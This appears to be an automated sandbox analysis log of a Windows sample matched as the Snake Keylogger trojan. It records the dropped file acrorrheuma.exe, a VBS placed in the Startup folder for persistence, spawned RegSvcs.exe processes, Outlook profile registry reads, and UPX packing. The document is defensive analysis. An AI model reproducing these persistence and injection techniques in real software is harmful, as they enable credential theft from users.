Source: 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: acrorrheuma.exe PID: 732, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7556, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: acrorrheuma.exe PID: 7212, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/11@4/4

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00E0A06A GetLastError,FormatMessageW,

3_2_00E0A06A

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DF81CB AdjustTokenPrivileges,CloseHandle,	3_2_00DF81CB
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DF87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	3_2_00DF87E1
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004F81CB AdjustTokenPrivileges,CloseHandle,	6_2_004F81CB
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004F87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	6_2_004F87E1

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00E0B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

3_2_00E0B3FB

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00E1EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

3_2_00E1EE0D

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00E183BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

3_2_00E183BB

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DA4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

3_2_00DA4E89

Source: C:\Users\user\Desktop\drRbNknjyb.exe

File created: C:\Users\user\AppData\Local\meshuggenah

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\drRbNknjyb.exe

File created: C:\Users\user\AppData\Local\Temp\aut7DE.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\acrorrheuma.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: drRbNknjyb.exe	Virustotal: Detection: 72%
Source: drRbNknjyb.exe	ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\drRbNknjyb.exe

File read: C:\Users\user\Desktop\drRbNknjyb.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\drRbNknjyb.exe "C:\Users\user\Desktop\drRbNknjyb.exe"
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Process created: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe "C:\Users\user\Desktop\drRbNknjyb.exe"
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\drRbNknjyb.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\acrorrheuma.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe "C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe"
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe"
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Process created: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe "C:\Users\user\Desktop\drRbNknjyb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\drRbNknjyb.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe "C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe"	Jump to behavior

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: acrorrheuma.exe, 00000006.00000003.1304161619.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, acrorrheuma.exe, 00000006.00000003.1303104677.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, acrorrheuma.exe, 00000009.00000003.1422935990.0000000004320000.00000004.00001000.00020000.00000000.sdmp, acrorrheuma.exe, 00000009.00000003.1414155162.0000000004180000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: acrorrheuma.exe, 00000006.00000003.1304161619.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, acrorrheuma.exe, 00000006.00000003.1303104677.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, acrorrheuma.exe, 00000009.00000003.1422935990.0000000004320000.00000004.00001000.00020000.00000000.sdmp, acrorrheuma.exe, 00000009.00000003.1414155162.0000000004180000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DA4B37 LoadLibraryA,GetProcAddress,

3_2_00DA4B37

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DC8945 push ecx; ret	3_2_00DC8958
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004AC4C6 push A3004ABAh; retn 004Ah	6_2_004AC50D
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004C8945 push ecx; ret	6_2_004C8958
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004A2F12 push es; retf	6_2_004A2F13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A890D push es; ret	7_2_065A8920

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\drRbNknjyb.exe

File created: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\acrorrheuma.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\acrorrheuma.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\acrorrheuma.vbs

Jump to behavior

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	3_2_00DA48D7
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E25376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	3_2_00E25376
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004A48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	6_2_004A48D7
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_00525376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	6_2_00525376

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DC3187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_00DC3187

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
